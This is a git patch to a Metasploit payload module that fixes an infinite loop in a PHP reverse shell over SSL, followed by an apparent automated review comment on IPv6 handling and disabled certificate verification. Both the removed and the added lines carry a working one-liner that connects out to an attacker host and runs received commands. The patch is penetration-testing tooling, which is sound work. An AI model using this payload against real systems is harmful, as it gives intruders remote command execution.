From a1896737827263b86e81324ec3898820efc26360 Mon Sep 17 00:00:00 2001
From: Brent Cook
Date: Thu, 22 Feb 2018 07:03:52 -0600
Subject: [PATCH] Land #9584, Fix reverse_php_ssl infinite loop
---
 modules/payloads/singles/cmd/unix/reverse_php_ssl.rb | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)
diff --git a/modules/payloads/singles/cmd/unix/reverse_php_ssl.rb b/modules/payloads/singles/cmd/unix/reverse_php_ssl.rb
index d4740e5e39..bd65a0861e 100644
--- a/modules/payloads/singles/cmd/unix/reverse_php_ssl.rb
+++ b/modules/payloads/singles/cmd/unix/reverse_php_ssl.rb
@@ -9,7 +9,7 @@ require 'msf/base/sessions/command_shell_options'
 module MetasploitModule
- CachedSize = 132
+ CachedSize = 253
 include Msf::Payload::Single
 include Msf::Sessions::CommandShellOptions
@@ -49,6 +49,6 @@ module MetasploitModule
 lhost = datastore['LHOST']
 ver = Rex::Socket.is_ipv6?(lhost) ? "6" : ""
 lhost = "[#{lhost}]" if Rex::Socket.is_ipv6?(lhost)
- cmd = "php -r '$s=fsockopen(\"ssl://#{datastore['LHOST']}\",#{datastore['LPORT']});while(!feof($s)){exec(fgets($s),$o);$o=implode(\"\\n\",$o);$o.=\"\\n\";fputs($s,$o);}'&"
+ cmd = "php -r '$ctxt=stream_context_create([\"ssl\"=>[\"verify_peer\"=>false]]);while($s=@stream_socket_client(\"ssl://#{datastore['LHOST']}:#{datastore['LPORT']}\",$erno,$erstr,30,STREAM_CLIENT_CONNECT,$ctxt)){while($l=fgets($s)){exec($l,$o);$o=implode(\"\\n\",$o);$o.=\"\\n\";fputs($s,$o);}}'&"
 end
 end
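Review bot: In the second hunk the context lines compute a bracketed `lhost` and a `ver` flag, yet the new `cmd` string still interpolates `datastore['LHOST']`, so both locals are dead in the visible lines. The new code joins host and port into a single `host:port` URI, so an unbracketed IPv6 literal now produces an ambiguous address; either interpolate the local, as in `ssl://#{lhost}:#{datastore['LPORT']}`, or drop the two unused assignments. A one-line comment above `cmd` should also record that `verify_peer` is set to false, meaning the TLS channel is encrypted but the peer is not authenticated. The enclosing method starts outside the hunk.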